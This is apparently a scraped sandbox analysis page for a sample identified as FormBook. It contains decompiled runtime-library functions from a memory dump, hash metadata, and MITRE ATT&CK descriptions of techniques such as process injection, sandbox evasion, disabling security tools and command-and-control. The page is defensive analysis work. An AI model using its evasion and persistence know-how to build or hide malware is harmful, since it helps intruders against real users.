				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0509EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x051053ca
0x051053ce
0x051053d9
0x051053de
0x051053e1
0x051053e1
0x051053e6
0x051053f3
0x00000000
0x051053f8
0x051053fb

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 413283ca049f109e8beccab8abea3d671c075bcc0af733742bccb831e4a45a2a
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 35E08C32A046809BCF12DB88D654F9EB7FAFB84B00F150004A0095F6A0C764AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 050B35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0509EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x050b35a1
0x050b35a1
0x050b35a5
0x050b35ab
0x050b35ab
0x050b35b5
0x00000000
0x050b35c1
0x050b35b7

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 477db6b76cdd67b6017a2581a917041b66d9f0f1e6d29572d953ea33eca1aad7
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 26D0A931605180DAFF81EF10E298BECB3B6BB0020AF782865800206852E3BA4B0ED600

Uniqueness

Uniqueness Score: -1.00%

Function 0509AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0509AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0509aab6
0x0509aabb
0x050ea442
0x00000000
0x050ea448
0x050ea454
0x050ea454
0x0509aac1
0x0509aac1
0x0509aac6
0x0509aac6

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a7da4b8ab0b6db7d09b103c4b627c7039cfa8695853e8f86a56fecaf012f19e2
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 15D0C935352980CFDA5ACB0CC558B1933F4BB44B40FC50490E801CB721E72CD944CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0510A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0510A537(intOrPtr _a4, intOrPtr _a8) {

				return L050A8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0510a553

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: cbf1419997a6a4bfdfa7e4f98aabefa634e34ebef68b2848ed381312ff3ab474
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 05C01233180248BBCB12AE81DC04F4A7B2AEBA4B60F008010BA080A5618632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 0508DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0508DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L050A4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0508db4d
0x0508db54
0x0508db5f
0x0508db56
0x0508db56
0x0508db5c
0x0508db5c

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 8b192371db9e045cf6e7cd2f8b3b8b2ccb4a7dc12204a0e5e6ea907c1a5df685
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 12C08C32380A40AAEB222F20ED01F9436A0BB50B01F4800A06301DA0F0EBB8D801E600

Uniqueness

Uniqueness Score: -1.00%

Function 0508AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0508AD30(intOrPtr _a4) {

				return L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0508ad49

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 98cff854534c1290da50ef74e0dc625582254a77c32b28cf4fcdee2b4cdf5562
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: C7C02B331C0248BBC7136F85DE00F197F2DE7A0B60F004020F6040B671C932EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 050A3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050A3A1C(intOrPtr _a4) {
				void* _t5;

				return L050A4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x050a3a35

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: bfbe4b467b27ba39e96ebf626449eb2dde2fbf7377f850055ce4960f9bb5da10
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 24C08C33180248BBCB126E81EC00F457B29E7A0B60F000020B6040A56086B2EC60D588

Uniqueness

Uniqueness Score: -1.00%

Function 050B36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x050b36d2
0x050b36e8
0x050b36d4
0x050b36e5
0x050b36e5

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 536b552f5fb6bbe299b7e47be4bad725330cd34bd8eb36e021609c620d909bc4
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 2CC02B79350440BBEB151F30DD40FDC7294F750A21F7407547220454F0E6E89C00D100

Uniqueness

Uniqueness Score: -1.00%

Function 050976E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050976E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x050976e4
0x00000000
0x050976f8
0x050976fd

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 272e22e3799fc770132b22ab3e7a3fffac2eb5be3e4629aedd0f9c22e46a2bef
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 10C08C722611C05AEF2E5708EE24F3C3690FB09608F48019CEA02094A1C368B802D208

Uniqueness

Uniqueness Score: -1.00%

Function 050A7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050A7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x050a7d56
0x050a7d5b
0x050a7d60
0x050a7d5d
0x050a7d5d
0x050a7d5d

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 2f473851ef107c156a15624b3aa22f461e8c52288d44c6f8db1813cbefbff2fa
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 71B092353019808FCE56DF18C080F2933F4FB44A40B8440D0E400CBA20D229E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 050B2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B2ACB() {
				void* _t5;

				return E0509EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x050b2adc

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: dcd8d7b0971d144c564200f0e05afea37165d5a53aa316101ea6461a131b6ec5
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 18B01232D10440CFCF06EF40D610B5E7335FB40750F054490900127D30C229AC01DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0511FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0511FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E050CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05115720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05115720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0511fdda
0x0511fde2
0x0511fde5
0x0511fdec
0x0511fdfa
0x0511fdff
0x0511fe0a
0x0511fe0f
0x0511fe17
0x0511fe1e
0x0511fe19
0x0511fe19
0x0511fe19
0x0511fe20
0x0511fe21
0x0511fe22
0x0511fe25
0x0511fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0511FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0511FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0511FE01

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 092a22ceb644a01cc6d6ebdb06d9f5742cde8ca49c162cc3132a5b4cf1c43100
Instruction ID: 537dc1fb17cade140118821b321a2b053954b0a983b54841ecc462e7d8e797c8
Opcode Fuzzy Hash: 092a22ceb644a01cc6d6ebdb06d9f5742cde8ca49c162cc3132a5b4cf1c43100
Instruction Fuzzy Hash: FEF04636600201BFE6201A45DC06F27BF5BEB81730F150364FA284A1D1DB62F86096F8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report tgamf4XuLa

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
filenativeCOMMON

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181BA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON